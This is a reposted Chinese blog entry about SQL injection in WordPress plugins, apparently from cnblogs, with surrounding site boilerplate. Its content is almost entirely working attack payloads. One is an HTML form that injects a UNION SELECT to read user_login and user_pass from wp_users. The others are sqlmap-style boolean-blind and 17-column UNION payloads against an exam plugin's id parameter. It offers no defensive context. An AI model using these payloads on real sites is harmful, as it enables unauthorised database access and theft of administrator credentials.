码迷,mamicode.com
首页 > 数据库 > 详细

wordpress plugins sql injection

时间:2017-07-22 18:13:30      阅读:252      评论:0      收藏:0      [点我收藏+]

标签:load   bool   err   gen   use   form   wordpress   target   通过   

<*form method="post"
<*input type="text" name="CatID" value="0 UNION SELECT
user_login,user_pass FROM wp_users WHERE ID=1">
<*input type="submit">
通过提交的value
 
 
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=examapp_UserResult&info=view&id=78 AND 6705=6705
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: page=examapp_UserResult&info=view&id=-4748 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178716b71,0x6b4c5247597261614e73447378544741764b4f7172597a5a58494551685a7056644d6e595773496e,0x7162787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KttP

wordpress plugins sql injection

标签:load   bool   err   gen   use   form   wordpress   target   通过   

原文地址:http://www.cnblogs.com/hookbar/p/7221763.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!